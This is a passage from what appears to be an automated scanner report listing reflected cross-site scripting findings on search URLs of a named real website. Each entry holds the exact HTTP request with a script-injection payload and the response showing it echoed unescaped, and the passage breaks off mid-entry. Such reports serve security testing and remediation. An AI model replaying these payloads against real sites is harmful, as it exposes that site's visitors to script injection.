2.208. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86a68"><script>alert(1)</script>a1e7f72e2ef was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance86a68"><script>alert(1)</script>a1e7f72e2ef/BPA HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:12 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:13 GMT
Date: Thu, 10 Mar 2011 17:07:13 GMT
Content-Length: 21731
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="/search/google_appliance86a68"><script>alert(1)</script>a1e7f72e2ef/BPA" class="filters dottedLine">
...[SNIP]...

2.209. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 78c7d"><script>alert(1)</script>55828201eca was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance/BPA78c7d"><script>alert(1)</script>55828201eca HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:28 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:30 GMT
Date: Thu, 10 Mar 2011 17:07:30 GMT
Content-Length: 21834
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/search/google_appliance/BPA78c7d"><script>alert(1)</script>55828201eca" title="Register" class="moreLink">
...[SNIP]...

2.210. http://www.rodale.com/search/google_appliance/BPA [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e86ad'%3b9bf084198b4 was submitted in the REST URL parameter 3. This input was echoed as e86ad';9bf084198b4 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search/google_appliance/BPAe86ad'%3b9bf084198b4 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:31 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1799
Expires: Thu, 10 Mar 2011 17:37:32 GMT
Date: Thu, 10 Mar 2011 17:07:33 GMT
Content-Length: 21623
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
;
var axel = Math.random() + '';
var ord = axel * 1000000000000000000;
var topic = dfpTopic;
var sbtpc = dfpSubTopic;
var dfpCat= '';
var cat = dfpCat;
var dfpKeyword = 'BPAe86ad';9bf084198b4';
var siteName = 'rodale';
var dfpTile='1';
var tile = dfpTile;
var useCAS = 'N';
// ]]>
...[SNIP]...

2.211. http://www.rodale.com/search/google_appliance/BPA [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/BPA

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3acce"><script>alert(1)</script>79f41b9b7d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance/BPA?3acce"><script>alert(1)</script>79f41b9b7d9=1 HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:31 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:34 GMT
Date: Thu, 10 Mar 2011 17:06:34 GMT
Content-Length: 29285
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="https://member.rodale.com/membercenter/mvc/createUser?site=rodalehealth&amp;returnUrl=http%3A%2F%2Fwww.rodale.com/search/google_appliance/BPA?3acce"><script>alert(1)</script>79f41b9b7d9=1" title="Register" class="moreLink">
...[SNIP]...

2.212. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rodale.com
Path:   /search/google_appliance/Cleaning

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d248"><a>d6c347d5f7d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /search1d248"><a>d6c347d5f7d/google_appliance/Cleaning HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:06:37 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:36:40 GMT
Date: Thu, 10 Mar 2011 17:06:40 GMT
Content-Length: 22535
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<body id="" class="format-normal page-page search1d248"><a>d6c347d5f7d search1d248">
...[SNIP]...

2.213. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/Cleaning

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87aab"><script>alert(1)</script>093924cc8a2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /search/google_appliance87aab"><script>alert(1)</script>093924cc8a2/Cleaning HTTP/1.1
Host: www.rodale.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: _chartbeat2=rkdyf9xiaaxcx0fo; cmTPSet=Y;

Response

HTTP/1.1 200 OK
Server: Apache/2.2.15 (Unix) PHP/5.2.13
X-Powered-By: PHP/5.2.13
Last-Modified: Thu, 10 Mar 2011 17:07:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=1800
Expires: Thu, 10 Mar 2011 17:37:16 GMT
Date: Thu, 10 Mar 2011 17:07:16 GMT
Content-Length: 21761
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"
lang="en" xml:lang="en"
class=""
xml
...[SNIP]...
<a href="/search/google_appliance87aab"><script>alert(1)</script>093924cc8a2/Cleaning" class="filters dottedLine">
...[SNIP]...

2.214. http://www.rodale.com/search/google_appliance/Cleaning [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.rodale.com
Path:   /search/google_appliance/Cleaning

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single